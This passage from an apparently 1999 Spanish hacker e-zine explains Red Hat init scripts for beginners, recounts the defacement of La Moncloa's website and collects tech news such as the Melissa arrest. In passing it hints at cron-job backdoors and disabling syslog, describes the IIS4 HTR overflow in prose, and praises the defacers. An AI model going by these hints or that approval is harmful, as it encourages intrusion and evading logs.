al   puerto  23, esto  lo  hace  sobreescribiendo  el  archivo  /etc/issue  y 
/etc/issue.net

Recuerden  que  este  mensaje,  si se deja como esta es una base para obtener 
informacion sobre nuestro sistema, a  ver  lo  explico  de  otro modo, lo que 
contiene  el  archivo issue e issue.net es la version de la  distribucion  de 
Linux, y el Kernel que esta corriendo la maquina

Red Hat Linux release 6.0 (Hedwig)
kernel 2.2.5-15 on an i586
login:

Ya sabiendo  esto, viene  algun  script-kiddie de esos muchos que existen por 
aqui, van  en  busca de los ultimos xploits para ponerlos a correr en nuestro 
sistema, posiblemente  cambiando  el texto en estos archivos y anteponiendole 
unos # a  las  lineas del rc.local podemos hacer que les toque buscar un poco
mas  para   saber   que   version   de   SO corremos..., de todas formas esta
netcraft, el QueSo, y muchos otros metodos, pero haya ellos con lo que hagan.

Continuemos  con  el  archivo  rc.sysinit,   este   se   encarga   de  varias 
cosas,   demosle   un   vistazo  por  encima,  de  lo  contrario  se  volvera 
un documento muy extenso.

* Especifica el Path del sistema
* Lee la configuracion de la red si es que existe
* Ubica el archivo de los fuentes de las funciones que se encuentran
  en /etc/rc.d/init.d
* Carga el keymap para el teclado. (valga la redundancia)
* Carga las fuentes del sistema
* Carga la particion de Intercambio (swap)
* Especifica el Nombre del Host
* Especifica el NIS
* Verifica la integridad de los archivos del sistema
* Limpia la tabla de medios de almacenamiento (discos, CD's, etc)
* Carga los modulos de configuracion de Sonido del sistema
* Monta los otros systemas de archivos diferentes a los de Linux
* Ajusta el Reloj del sistema

En  fin  y hace un resto de cosas mas, les dejo la inquietud para que pasen a
ver ese archivo y se hagan una idea...Sigamos con el rc

Este  archivo  se  encarga  de  iniciar y detener servicio cuando el nivel de 
ejecucion cambia, asi como  tambien  de  la  configuracon  inicial de algunas
cosas basicas como el nombre del servidor.

Ok, ya que hemos visto estos archivos, ahora pasemos al siguiente directorio, 
/etc/rc.d/init.d

alli encontramos,  los  archivos  de  iniciaizacion de los demonios y algunas
otras funciones del sistema:
let's see...

[root@localhost init.d]# ls -alltotal 62
drwxr-xr-x   2 root     root         1024 Aug 10 22:58 .
drwxr-xr-x  10 root     root         1024 Aug 10 23:29 ..
-rwxr-xr-x   1 root     root          785 Apr 17 02:33 apmd
-rwxr-xr-x   1 root     root          884 Mar 21 14:26 atd
-rwxr-xr-x   1 root     root          883 Apr 14 18:09 crond
-rwxr-xr-x   1 root     root         6799 Apr  7 17:45 functions
-rwxr-xr-x   1 root     root         1158 Mar 22 11:30 gpm
-rwxr-xr-x   1 root     root         2266 Feb 13 18:23 halt
-rwxr-xr-x   1 root     root          865 Apr  7 16:17 httpd
-rwxr-xr-x   1 root     root         1509 Apr  7 16:21 inet
-rwxr-xr-x   1 root     root         1072 Apr 15 11:31 keytable
-rwxr-xr-x   1 root     root          447 Apr 20  1998 killall
-rwxr-xr-x   1 root     root         1074 Mar 22 17:05 lpd
-rwxr-xr-x   1 root     root         1285 Mar 31 10:57 named
-rwxr-xr-x   1 root     root         2775 Mar 26 17:56 netfs
-rwxr-xr-x   1 root     root         5133 Apr  6 11:30 network
-rwxr-xr-x   1 root     root         2408 Apr 15 23:19 nfs
-r-xr-xr-x   1 root     root         3438 Apr 19 20:56 pcmcia
-rwxr-xr-x   1 root     root          986 Mar 23 16:38 portmap
-rwxr-xr-x   1 root     root         1532 Feb  4  1999 random
-rwxr-xr-x   1 root     root         1170 Mar 21 23:00 routed
-rwxr-xr-x   1 root     root          780 Apr  6 17:21 rstatd
-rwxr-xr-x   1 root     root          773 Apr  6 17:21 rusersd
-rwxr-xr-x   1 root     root          780 Apr  9 13:15 rwhod
-rwxr-xr-x   1 root     root         1440 Apr 19 15:38 sendmail
-rwxr-xr-x   1 root     root         1451 Apr 15 08:53 single
-rwxr-xr-x   1 root     root          905 Apr 15 23:53 smb
-rwxr-xr-x   1 root     root         1430 Mar 30 11:52 sound
-rwxr-xr-x   1 root     root          923 Apr 13 13:26 syslog
-rwxr-xr-x   1 root     root          957 Apr 18 18:33 xfs
-rwxr-xr-x   1 root     root         1457 Apr 15 19:02 ypbind 

Creo  que la mayoria de los nombres se explican por si solos veamos que hacen 
algunos que nos conciernen en este momento:

apmd:
^^^^^
Este  script  revisa  constantemente  el estado de la bateria (me imagino que
sera de una UPS o algo asi), y guarda logs  por  medio del syslog(8), tambien
se utiliza para hacerle un shutdown a la maquina en caso de que la bateria no
este con carga suficiente para soportar el equipo.

Nombre  del  proceso  que  corre apmd (Advanced power management daemon creo)
Su  configuracion  se  puede  encontrar en /etc/sysconfig/apmd que en mi caso
esta asi:APMD_OPTIONS="-p 10 -w 5 -W"

atd:
^^^^
Su funcion es inicializar el demonio  at,  el  cual  corre comandos que esten 
programados por el comando at  a  la  hora  que  fue  especificada,  y  corre
comandos tipo batch cuando haya suficiente sistema disponible para hacerlo.

crond:
^^^^^^
Bueno, debo  suponer  que  ya  saben  la  funcion de este demonio, pues se ha
hablado mucho  de  esto, cosas  como  adicionar  a  sus  trabajos  uno que te
habilite una cuenta de acceso al sistema a determinadas horas y cosas  por el
estilo.Bueno, este demonio se encarga de iniciar/detener el demonio crond.

functions:
^^^^^^^^^^
Este  archivo  contiene  las funciones que son llamadas por la mayoria de los 
scripts que se encuentran en en directorio /etc/init.d

gpm:
^^^^
Este  se  encarga  de  proveer soporte para el mouse en la aplicaciones Linux 
basadas en texto.
						 
halt:
^^^^^
Este script es ejecutado  por  init cuando se pasa a nivel 0 (halt) o nivel 6 
(reinicio). Este mata todos los  procesos,  desmonta  todos  los  sistemas de 
archivos y reinicia el sistema.
						 
httpd:
^^^^^^
Ni  hablar,  este  se  encarga  de  incializar  el  script  para el Apache, o
cualquier otro demonio que proveea conexion http.

inet:
^^^^^
Inicia  los  servicios de red TCP/IP. Tambien configura el hostname, crea los 
ruteos e inicia el demonio Internet Network y el Portmapper (RPC).

keytable:
^^^^^^^^^
Este carga el keytable. Cabe anotar  que  debe  ser cargado *depues* de haber 
montado el directorio /usr.

killall:
^^^^^^^^
Menudo, me suena como a una cancion de Metallica....
Se encarga de matar todos los procesos innecesarios que esten corriendo, y ya
que no debe haber ninguno, este es un proceso para chequeo unicamente.

lpd:
^^^^
Este trabaja iniciando y deteniendo el lpd (demonio de impresion).

named:
^^^^^^
Este se encarga de iniciar/detener el named (Servidor DNS), que es usado para
convertir nombres de hosts a direcciones IP.
					
netfs:
^^^^^^
Este tiene la funcion de cargar los sistemas de archivos de redes.

network:
^^^^^^^^
Activa y desactiva todas  las  inerfaces  de  red que estan configuradas para
inciar a la hora de inicio del sistema.

nfs:
^^^^
Activa y desactiva los  servicios NFS, el cual es un protocolo que se utiliza 
para compartir archivos a traves de TCP/IP.

pcmcia:
^^^^^^^
Este se encarga de la inicializacion de los dispositivos pcmcia.

portmap:
^^^^^^^^
Inicia y detiene el RPC portmapper, que se encarga de maaejar las conecciones
RPC que son usadas por protocolos como el  NFS  y  NIS, este  debe  correr en 
maquinas  que  actuen  como  servidores para los protocolos que hacen uso del 
mecanismo de RPC.
					
random:
^^^^^^^
Les suenan los numeros aleatorios..???, pues de eso se encarga este script...
no en si de los numeros, pero si  de  subir  el  servicio que los genera para 
cualquier necesidad...

routed:
^^^^^^^
El demonio routed permite la actualizacion automatica de la tabla IP de ruteo
a traves del protocolo RIP.

rstatd:
^^^^^^^
Este  se  encarga  de  permitir  a  los  usuarios  de  una red, recuperar las 
estadisticas de desempeño de cualquier máquina en esa red.

rusersd:
^^^^^^^^
El  protocolo  del rusers permite a los usuarios en una red localizar a otros 
usuarios en cualquier maquina de la red.

rwhod:
^^^^^^
Imagino que de este tambien habran  oido hablar bastante, les suena el who.??
Pues  sirve  para  iniciar el demonio del who, que permite a un usuario tener
una lista de todos los usuarios que estan actualmente loggeados al sistema.

sendmail:
^^^^^^^^^
Bueno,  de este ni hablar, si no saben de que hablo, vayanse a una R anterior 
y lean algo  sobre Linux. (Aunque se que este articulo, es poco tecnico y muy 
pensado para novatos  *como yo*, pues  uno no deberia querer caminar antes de 
aprender a gatear), en fin las cosas hay  que  hacerlas  desde  el principio.
Ok, este  se  encarga  de transportar los mensajes de correo de una maquina a 
otra.

single:
^^^^^^^
Este  script  es  ejecutado  por  el init cuando el sistema pasa a runlevel 1
(nivel administrativo), mata todos los  demonios y pone al sistema en modo de 
un solo usuario. El sistema de archivos no se desmonta.

smb:
^^^^
Se  encarga  de  iniciar/detener  los  demonios de Samba que se utilizan para 
proveer los servicios de red SMB. (conexion con NT principalmente)

sound:
^^^^^^
Guarda  y  restaura  la  configuracion  de  la  tarjeta  de sonido durante el
inicio y apagado del sistema.

syslog:
^^^^^^^
Bueno, de  este ni hablar, se encarga de proveer la facilidad a la mayoria de 
los demonios para loggear  mensajes  a  los  logs  del  sistema.  Ya saben su
utilidad tumbenlo y veran que pasa..!!! ;)

xfs:
^^^^
Inicia/detiene el X font server a la hora de inicio y apagado del sistema.

ypbind:
^^^^^^^
Inicia el demonio upbind que corre en los clientes NIS/YP


Bueno, creo  que  es todo  por ahora, espero en el proximo numero entregarles
una descripcion  mas  detallada  de  estos  scripts,  para ver como funcionan
realmente, que  mas  se  puede hacer con ellos, y cosas asi por el estilo, si
sos un Elite, no debes estar leyendo esto, porque  me  imagino  que te habras
aburrido desde el inicio, ya que todo esto  fue  pensado  para  principientes
como yo.

Y  como  soy humano, puedo comenter errores, para cualquier duda o aclaracion
mandame un e-mail a 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 .

Nos vemos en el proximo numero.

Taker.


"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*

13. ___________________________________________ Historia de un cr/hackeo mas!
                                                By TnK

ULTIMA HORA:

UN  GRUPO  DE  HACKERS  ASALTA  LA  PAGINA WEB OFICIAL DEL GOBIERNO ESPA~OL Y 
                    MODIFICA LA FOTO DEL PRESIDENTE AZNAR.

REDACCION.-
Un  grupo  de  hackers espa~oles logro anoche entrar en la pagina web oficial 
del Gobierno espa~ol, con  url  en  http://www.la-moncloa.es , y la sustituyo 
por un escrito critico, y donde explicaban los motivos de la intrusion.

Aparte, a~adian una fotografia del presidente del gobierno Aznar, modificada, 
en la que pintaron unos cuernos y una boca que derramaba sangre. 

La pagina hackeada se puede ver en: 
http://www.labrujula.net/1999/agosto/miercoles,11,8.htm 

El texto que menciona el caracter  fascista del gobierno espa~ol, y acaba con 
la siguiente frase:

" Un cambio de pagina web es lo minimo  que  podemos hacer, no lo tomeis como 
amenaza, es la unica manera de haceros ver  que nuestro pais NO VA BIEN. (esa 
es la voz del pueblo)".

Este grupo espa~ol se denominan AliaNZ3 (Alianze), y  lo  forman 4  hackers o 
crackers,  que  actuan  con  los  sobrenombres  de: Rand0mize,  Pr|z,  Okupa, 
Antiaznar y mandan recuerdos( Gr33tz) a |TrUcK|, ^SlAyEr^ y Silencer.

Aunque al parecer alguno de ellos tenia el nick registrado en el IRC hispano, 
aparte  del  canal  del grupo, pero  aun no han  conseguido  capturarlos.  Si 
pusieron sus verdaderos apodos, darian  muestras de ser muy ingenuos, pero si 
eran falsos, pudieron incriminar a alguien  sin  querer  y meterle en un buen 
lio...  ;-P


No es la primera vez que se cuestiona la seguridad del sistema informatico de 
la sede de la Presidencia del Gobierno.

Hace algo mas de tres a~os unos estudiantes de telecomunicacion  avisaron  al 
administrador del sistema de la posibilidad de que el correo electronico (que 
todavia  no  se  estaba  utilizando  oficialmente),  pudiera ser interceptado 
aprovechando una vulnerabilidad de la version de software  (Bug)  que  habian 
averiguado que se utilizaba en tan sensible ordenador.

Basicamente, en aquella ocasion se comprobo que  para  ese  software  que  se 
estaba  utilizando,  ya  se  habian  conocido  y  publicado  formas  de hacer 
tecnicamente  posible  un ataque  al sistema en circunstancias muy concretas, 
que nunca se dieron.

La pagina de La Moncloa tenia agujeros  por  todos  los  lados;  si  nadie ha 
entrado,  ha  sido,  probablemente, porque no se pensaba que fuera tan  facil 
hacerlo...

Datos tecnicos:.

Sistema de los intrusos: Sistema  operativo Linux, con una version del kernel 
2.2. 10-ac10, una de las ultimas en aparecer.

Posiblemente  sacaron  los  datos  del  nucleo  (Kernel)  de  alguna de estas 
maneras... 

Nada mas producirse el ataque, les llego un mail a la brujula.net avisandoles 
de  lo  ocurrido,  proveniente de los autores.  El Netscape para linux, en el 
X-Mailer: aparte de poner Mozilla, la version y demas, incluye la version del 
kernel.

Se  supone  que  es  de  este mail de donde sacaron la informacion, o bien si 
accedieron a la pagina con un  netscape,  como  parece  que  dice la noticia, 
suele  dejar  en  el  Agent Log del servidor web la version que esta usando y 
bajo que kernel se esta ejecutando...

Maquina de la moncloaka: 

Los funcionarios a cargo  del sistema de La Moncloa venian utilizando Windows 
NT 4.0 con IIS 3.0 (Internet Information Server), el software servidor de web 
de Microsoft, que a mediados  de  1997 fue sustituido por la version 4.0, que 
era de distribucion gratuita. Desde esa  fecha  hasta  hoy se han descubierto 
numerosos  "agujeros"  y  fallos  de  seguridad, tanto  en sistema  operativo 
Windows NT 4.0 como en el software IIS.

Bug del IIs.

El  "Equipo  de Seguridad Digital Ojo Electronico" (eEye) http://www.eeye.com 
descubrio el 17  de Junio de 1999, que mas del 90% de los servidores web bajo 
Windows NT pueden ser  controlados por cualquier intruso sin mas que explotar 
un grave defecto en el Internet Information Server 4.0 de Microsoft (IIS4).

Este  bug, se basa en  desbordamientos  de  buffer;  es  decir,  defectos  de 
programacion  que permiten que zonas de memoria intermedia se saturen ante un 
exceso de datos que  no  pueden asimilar, provocando la caida del sistema y/o 
su control remoto por parte de intrusos. 

Como es sabido, el servidor  IIS4  de  Microsoft,  reconoce unas determinadas 
extensiones de fichero que requieren ser procesadas en el propio servidor. 

Cuando un usuario demanda un fichero de uno de estos tipos (ASP, IDC, HTR...) 
se filtra hacia una biblioteca dinamica (un fichero DLL)  que  se  encarga de 
manejarlos.  Si  la  URL  es  suficientemente  larga (y dado que IIS la  pasa 
completa a la DLL), es muy probable que se logre  sobresaturar algun buffer y 
que ocurra lo peor.

Usando  el  'Retina',  nuevo  scanner  para Win12 NT( Version beta) de Eeye y 
cuando  llevaban  una hora  intentando  lograr   ese  efecto  con  unas  diez 
diferentes  extensiones  de  fichero, una  URL  de unos  3000  caracteres  de 
longitud hizo caer el servidor. La extension testeada en ese momento era HTR.

Esa extension corrresponde a una funcionalidad  de IIS4 que permite modificar 
las contrase~as de usuario de forma remota. Para complicar aun mas las cosas, 
el filtro de las extensiones HTR (ISM.DLL) se  instala  siempre por defecto y
--segun  afirma  eEye-  sitios como el Ejercito USA, el NASDAQ  y  la  propia 
Microsoft utilizan estos servidores.

Por otro lado 'eEye' adopto  la  arriesgada decision de hacer publico tambien 
el codigo que permite aprovechar el agujero (IISHack).

Urls:
http://www.eeye.com/database/advisories/ad06081999/ad06081999.html
http://www.cert.org/advisories/CA-99-07-IIS-Buffer-Overflow.html
http://www.microsoft.com/security/bulletins/ms99-019.asp


Aquel dia 11 de Agosto, miercoles, en la medianoche,  dia  del famoso eclipse 
de Sol, los muchachos entraron aprovechando posiblemente  este  bug, contando 
tambien con inexplicable ausencia de una administracion rigurosa  y constante 
sobre el servidor web de Presidencia del Gobierno.

La  pagina  introducida  por  los hackers estuvo activa durante mas de  nueve 
horas. Decenas de miles de personas  lo  supieron  antes  de  que el gobierno 
espa~ol  tomara medidas.Hasta pasadas las nueve de la ma~ana, hora  espa~ola, 
los funcionarios  del  area informatica de La Moncloa no eliminaron la pagina 
"crackeada", restituyendola por la original.

De todas formas una  maquina  como  el  servidor  www  de Moncloa no creo que 
contenga secretos ni sea una maquina "conflictiva" en este  aspecto.  Esto ha 
sido  carnaza para los medios de comunicacion y una forma de reprimir  a  sus 
anchas  a  todo  aquel  que  pueda  tener algo de poder... XDDD  otra vez los 
peligrosos hackers....!!!!

Pero no ha estado mal este "tiron de orejas" a un gobierno que no funca...  
:-P

CONCLUSION:  Lo  que es bastante grave, es que un pais como este, que presume 
de  ser  tan  prestigioso y avanzado, deje ese servidor y todos sus datos tan 
accesibles, ante  el  ataque  aleatorio de unos chavales que probablemente le 
den mil vuetas a los administradores  que  se  encargan de protegerlos, y eso 
que Espa~a Ba Vien!!!! 


Mis felicitaciones para el grupo Alianz3!!                
Un saludo...   TnK   
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
  

"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*

14. ______________________________________ Noticias del Mundo del Espectaculo 
                                           By Mate y TnK

EL SOSPECHOSO DE PROPAGAR EL MELISSA ADMITIO SER EL CREADOR DEL VIRUS

El  ciudadano  de  Nueva  Jersey  acusado de haber creado el devastador virus 
informatico Melissa, el cual destruyo  cientos  de sistemas en todo el mundo, 
admitio ante los investigadores ser el responsable del mismo. 

El 1 de abril pasado David L.  Smith  habia  sido  arrestado   por  oficiales 
estatales y federales  norteamericanos y acusado de crear y propagar el virus  
que se conocio en Internet el ultimo 26 de marzo.

Smith -de 30 a~os- habia sido capturado en la casa de su hermano en la ciudad 
de Eatontown tras  haber sido investigado por el FBI, organismo que conto con 
la ayuda de America Online para acceder al hacker.

Smith admitio  haber  escrito el macro virus Melissa, haber accedido en forma 
ilegal  a   America  Online  con  el  proposito  de publicarlo en Internet, y 
destruido la computadora personal que utilizo para  desarrollar  el virus con 
el fin de eliminar todo tipo de evidencias.

Sin embargo, antes de llegar a esta reciente confesion tuvieron  que  pasarse 
por distintas instancias. En abril, Smith se habia declarado  inocente de los 
cargos  que   se~alaban  que  habia  interrumpido  comunicaciones  publicas y 
conspirado para cometer el da~o que realizo.

A  su  vez,  se habia declarado inocente de otros dos cargos menores: robo de 
servicios de computacion y acceso ilegal a sistemas informaticos.

El virus Melissa fue  introducido  inicialmente  en  un  newsgroup   de  sexo 
utilizando la cuenta de AOL de Scott Steinmetz, cuyo  nombre  de  usuario era 
"skyroket".  Steinmetz,   un   ingeniero   civil  de  la  ciudad de Lynnwood, 
Washington, manifesto en su momento que no tenia   nada   que   ver   con  el 
desarrollo y la propagacion del virus.

El mismo utilizaba una combinacion  de  los  programas de Microsoft Outlook y 
Word  para   propagarse,   tomando  ventaja de las direcciones de mail de los 
usuarios para aparentar que  se trataba de un mensaje enviado por una persona 
conocida.

Si finalmente Smith quien esta  en  libertad  tras haber pagado una fianza de 
100 mil dolares es sentenciado, podria pasar hasta 40 a~os en prision y pagar 
multas por hasta 480 mil dolares.


ARGENTINA LEGALIZARIA LAS FIRMAS DIGITALES

De  acuerdo  a  lo  informado  por  representantes  del gobierno, el Congreso 
argentino estaria a punto de aprobar la ley que -una  vez puesta en vigencia- 
convertiria al pais en la primera nacion de America Latina en darle un status 
absolutamente  legal  a  los  acuerdos y contratos  "firmados"  a  traves  de 
Internet mediante firmas digitales.

Segun comento la secretaria de  la  funcion  publica Claudia Bello, la ley de 
firmas  digitales  le  daria  a los documentos  rubricados  en  forma  online  
absoluta legitimidad a traves  de  un  sistema  de  autenticacion  de  maxima 
seguridad.  Por  otra  parte, este significativo paso le daria un  importante 
empuje a todo lo relacionado  al  comercio  electronico, le  permitiria a los 
ciudadanos utilizar computadoras hogare~as para firmar documentos  oficiales, 
al  gobierno  "combatir  la  corrupcion", y  ahorrar  millones de dolares  al 
eliminar la burocracia que genera trabajar con papeles.  Bello  agrego que el 
gobierno argentino estuvo trabajando durante dos a~os y medio en el proyecto, 
y que llego el momento de poner en practica este moderno sistema.

"Argentina  es  el  primer  pais  de America Latina en lanzar un sistema como 
este", dijo Bello, quien viajo junto al presidente Carlos Menem rumbo a Chile 
donde  se  encontraran con el mandatario  Eduardo  Frei  para  ayudar  en  el 
desarrollo de un sistema similar en ese pais.

Por su parte, Enrique  Carrier  -director  asociado  de la consultora Price & 
Cooke- elogio la iniciativa: "El sistema ya se este  utilizando  en  forma no 
oficial en distintos ambitos para agilizar las operaciones comerciales,  pero 
sin una plataforma legal que obligaba a tener que repetir todo el proceso  en 
papeles. Pero por suerte, dentro de poco tiempo esto cambiara".

Price  & Cooke estima que existen alrededor de 350 mil conexiones de Internet 
en la Argentina,  pero  reconoce que el comercio electronico no tiene un buen 
nivel de desarrollo fundamentalmente  por  preocupaciones relacionadas con la 
seguridad de la informacion online, un aspecto que mejorara con la aplicacion 
de la nueva ley.


CONDENAN  POR  PRIMERA  VEZ  A  UNA  PERSONA POR VIOLAR LEYES DE COPYRIGHT EN 
					 INTERNET

Segun  informo  el  Departamento  de Justicia de los Estados Unidos (DOJ), un 
joven estudiante de Oregon que distribuia  musica,  peliculas,  y software en  
su pagina web resulto ser la primera persona condenada por un crimen bajo las  
leyes norteamericanas que castigan la pirateria por Internet.

De  acuerdo  a los datos suministrados por el DOJ, Jeffrey Gerard Levy, de 22  
a~os y estudiante  de  la  Universidad  de  Oregon  en Eugene, fue encontrado 
culpable de haber violado la ley denominada "No Electronic Theft Act of 1997"  
(No a lo robos electronicos).

El DOJ manifesto que Levy admitio haber "publicado en forma ilegal software y 
juegos  para  computadoras,  grabaciones  de  temas  musicales,  y  peliculas 
grabadas en forma digital en el site que tenia en la web,  permitiendo que el 
publico en general pudiera bajarlos de la red y realizar copias  del material 
sobre el cual existian derechos de autor".

De todas formas, un vocero del Departamento de Justicia informo que no existe 
evidencia alguna de que Levy haya ganado dinero con esta actividad. 

Segun  las leyes norteamericanas, cualquier persona que distribuya diez o mas 
trabajos  sobre  los  cuales  existan  copyrights con un valor de mas de 2500 
dolares puede recibir una pena que alcanzaria  hasta los tres a~os de prision 
y una multa de 250 mil dolares. Tras haber sido  encontrado  culpable  de los 
cargos que se le acusaban, Levy sera sentenciado el proximo 2 de noviembre.


DESARROLLAN UN VIRUS QUE AFECTARIA AL WINDOWS EL DIA DE NAVIDAD

Distintos  expertos  del  ambito  informatico  descubrieron  un  nuevo  virus 
dise~ado  para da~ar las computadoras personales que trabajan con el  sistema 
operativo Windows el proximo 25 de diciembre. 

De todas  formas,  el  virus  no  fue  detectado  fuera  del  ambito  de  los 
laboratorios,  lo  que lleva a los expertos a considerar que el nivel de da~o 
que puede provocar seria entre "medio y bajo".

Compa~ias privadas  vinculadas  con la industria de los antivirus y Kaspersky 
Lab nombraron al nuevo virus Win32.Kriz.9862  y  comentaron  que contiene una 
carga  aun  mas poderosa que la del recordado Chernobyl que afecto  miles  de 
computadoras en Asia hace algunos meses.

"Este es un  virus peligroso, pero todavia no existen indicios de que se haya 
propagado", dijo  Roger  Thompson,  uno  de  los  representantes del grupo de 
productores de redes de seguridad para computadoras conocido como ICSA. 

"No veo nada en este virus que lo haga dificil de  detectar, por lo que es de 
esperar que dentro de los proximos dias la mayor cantidad de usuarios posible 
tenga a mano una solucion para combatirlo". A su vez,  Thompson dijo que como 
el  virus  recien  se  activara   el proximo 25 de diciembre, hay  suficiente 
tiempo  como  para  tomar  las  medidas  necesarias  para  que  no afecte los 
sistemas.

Pero  por otro lado, Keith Peer presidente de la compa~ia Central Command que 
trabaja en  el  mercado  de  los  antivirus,  manifesto  que  los expertos de 
seguridad sabian todo sobre el virus Chernobyl, pero que de todas  formas  el  
virus afecto mas de 30 mil computadoras en Asia.

"El  problema es que si un virus como este sale de los laboratorios y alcanza  
las  maquinas   de  uso  cotidiano,  el  importante  numero  de  usuarios  de 
computadoras  que  no  utiliza  antivirus  o  algun tipo de proteccion podria 
provocar un efecto devastador", dijo Peer.

Por ultimo, Central Command informo que el Win32.Kriz.9862  es  un  virus que 
reside en la memoria del Windows y que replicar  por si solo en los  sistemas  
con Windows 95, Windows 98, y Windows NT, infectando los programas de Windows 
con  extensiones  de  archivos  EXE  (ejecutables),  o  SCR  (protectores  de 
pantalla). 

A su vez, el virus infecta la libreria KERNEL32.DLL que le permite permanecer 
en la memoria de la computadora durante toda la sesi¢n de Windows.  

URL: http://www.news.com


CRITICAN EN ESPA¥A AL DICCIONARIO DE MICROSOFT

El  gobierno  espa~ol,  con  la  intencion  de  prevenir  posibles  problemas 
sexistas,  solicito a Microsoft que cambie algunos terminos en el diccionario 
castellano del Word ya que algunas mujeres los encontraron ofensivos. 

El grupo denominado  Women Institute manifesto que recibio quejas de un grupo 
de mujeres sobre sinonimos  incluidos  en  el  diccionario  que  consideraban 
"claramente sexistas".

Entre  las  palabras  mas  objetadas figuran los sinonimos que el diccionario 
brinda para "ansiosa", para la  cual  cita  como alternativas a vocablos como 
"ninfomana, libertina, y  vida de sexo".

La controversia tambien aumenta ya que para la version  masculina del termino 
"ansioso", los sinonimos son "codicioso, anheloso, ambicioso, y cuidadoso".

El diccionario de Microsoft tambien ofrece sinonimos femeninos para "ligera", 
entre   los  que  incluye  "frivola,  vana,  presumida,  coqueta,  infiel,  o 
enga~osa". 

Por  su  parte,  los  mas halagadores sinonimos para la version masculina son  
"rapido, agil, liviano, delgado, y delicado".

Otra de las palabras que  llevaron a este grupo de mujeres a quejarse ante el 
gobierno espa~ol fue "jefa", para  la cual se ofrecen sinonimos como "due~a o 
patrona", mientras que para la version  masculina las opciones son "director,  
superior, o manager".

A pesar del descontento, el Women Institute dijo que le ofrecio su ayuda a la 
unidad espa~ola de Microsoft para modificar el  diccionario. Sin embargo, una 
vocera de la compa~ia de Bill Gates manifesto que  el gigante del software no 
tenia  novedad alguna sobre la queja que llego a oidos  del  propio  gobierno 
espa~ol.


LINUX SIGUE GANANDO TERRENO EN EL MERCADO DE LOS SISTEMAS OPERATIVOS 

Segun  los numeros de un nuevo estudio dado a conocer ayer, Linux esta ganado 
espacio a costas del Windows 2000 en el ambito de los sistemas operativos, ya 
que cada  vez  son  mas  las compa~ias que lo estan adoptando mientras el mas 
reciente OS para empresas de Microsoft sufre continuas postergaciones. 

El estudio realizado por  International  Data Corporation (IDC) establece que 
el 13 por ciento de los consultados respondio  que actualmente utiliza Linux,  
cuando  en  1997 el software registraba un porcentaje  tan  bajo  que  no  le 
permitia ni siquiera ingresar en las estadisticas de las consultas. 

Fabricantes  de  peso como IBM y Hewlett-Packard son algunas de las compa~ias 
que ya manifestaron  su  apoyo  a  Linux,  el  cual  gano  popularidad en los  
mercados de los servidores de correo electronico y de la web. El  Linux es un 
sistema  operativo  similar  al  Unix,  y fue creado originalmente por  Linus 
Torvalds cuando recien terminaba sus estudios universitarios. 

"El 13 por ciento de aceptacion que  registro  el  Linux  muestra un nivel de 
crecimiento  sorprendente",  comento el representante de IDC  Dan  Kusnetzky, 
quien agrego que el sistema  operativo surge como un "potencial competidor de 
peso para el Windows y el Unix en algunas aplicaciones para servidores". 

A su vez, el estudio indica que varias de las compa~ias consultadas no tienen 
planes inmediatos de implementar  el Windows 2000, en el cual esta trabajando 
Microsoft por estos dias para darle su forma definitiva. 

"Organizaciones de distintas clases y  tama~os  indicaron que planean esperar 
entre seis y 18 meses antes de comenzar a utilizar el nuevo sistema operativo 
de  Microsoft  para  corporaciones",  decia  el  informe. A su vez el reporte 
agregaba que "la primera razon dada por los encuestados  para  justificar  la 
razon  por  la cual no trabajaran con el OS de Microsoft en un principio tuvo 
que ver con la estabilizacion tecnica del sistema operativo. 

Un 50 por ciento  de  los  consultados dijo que prefiere esperar hasta que el
Windows 2000 se estabilice antes de utilizarlo".   

URL:  http://www.news.com 

SONY DESARROLLA DISCOS RIGIDOS DE PLASTICO 

De  acuerdo  a lo manifestado por la propia empresa a un diario japones, Sony 
esta desarrollando el primer disco rigido de plastico para computadoras junto 
a la compa~ia quimica Nippon Zeon. 

En relacion a lo importante que significaria para Sony y para la industria en 
general la fabricacion  de  este tipo de dispositivos, el diario Nihon Keizai 
Shimbun publico ayer que el costo de la fabricacion de discos de plastico con 
capacidad para almacenar cinco gigabytes seria entre un 30 y un 40 por ciento 
menor que el de los convencionales discos de aluminio. 

Si  bien  no  especifico  cuanto mas barato puede resultar su fabricacion, un 
vocero de Sony manifesto que el costo de produccion puede ser menor ya que el 
disco plastico no necesita el mismo proceso de lustre. 

De  todas formas, el representante de la compa~ia no dio muchos mas detalles, 
e incluso no revelo cuando Sony comenzara con la produccion comercial. 

Con  cierto   escepticismo,   distintos  analistas  del  mercado  informatico 
manifestaron que Sony todavia  no  completo el desarrollo del disco, y que es 
dificil evaluar esta nueva tecnologia en la actual etapa de trabajo. 

"Sony  ha  estado  promocionando  distintos   tipos  de  discos  rigidos  con 
diferentes socios, y no iniciar  sus inversiones hasta que tenga en claro que 
tecnologia es la mejor", dijo el analista de ING Barings, Masashi Kubota. 

Entre  otras  compa~ias,  Sony esta manteniendo conversaciones con Castlewood 
Systems Inc de los Estados Unidos  para la comercializacion de discos rigidos 
que utilicen discos basados en plastico.

A  su  vez, Sony tambien se unio con Quantum -el segundo fabricante de discos 
de computadora  mas  grande  del  mundo  y  con  Western  Digital  Corp  para 
desarrollar discos basados en vidrio y aluminio. 


SE TRIPLICARIAN LOS GASTOS RELACIONADOS CON LA SEGURIDAD DE LAS REDES PARA EL 
                                    2003

Mientras  aumente  el uso de redes de computadoras y proliferen los programas 
desarrollados para el  comercio  electronico, el mercado mundial de productos  
relacionados con la seguridad de las  redes se triplicaria hasta alcanzar los 
8 mil millones de dolares para el a~o 2003, de acuerdo a un estudio realizado 
por al consultora Datamonitor.

En el informe titulado Network Security 1998-2003, Datamonitor  establece que 
el  mercado  crecer  hasta alcanzar los 4,68 mil millones de dolares  en  los 
Estados Unidos,  cuando  el  a~o  pasado  esa  cifra  llegaba  a los 1,43 mil 
millones.  Por  su parte, el mercado europeo registrara un crecimiento que lo 
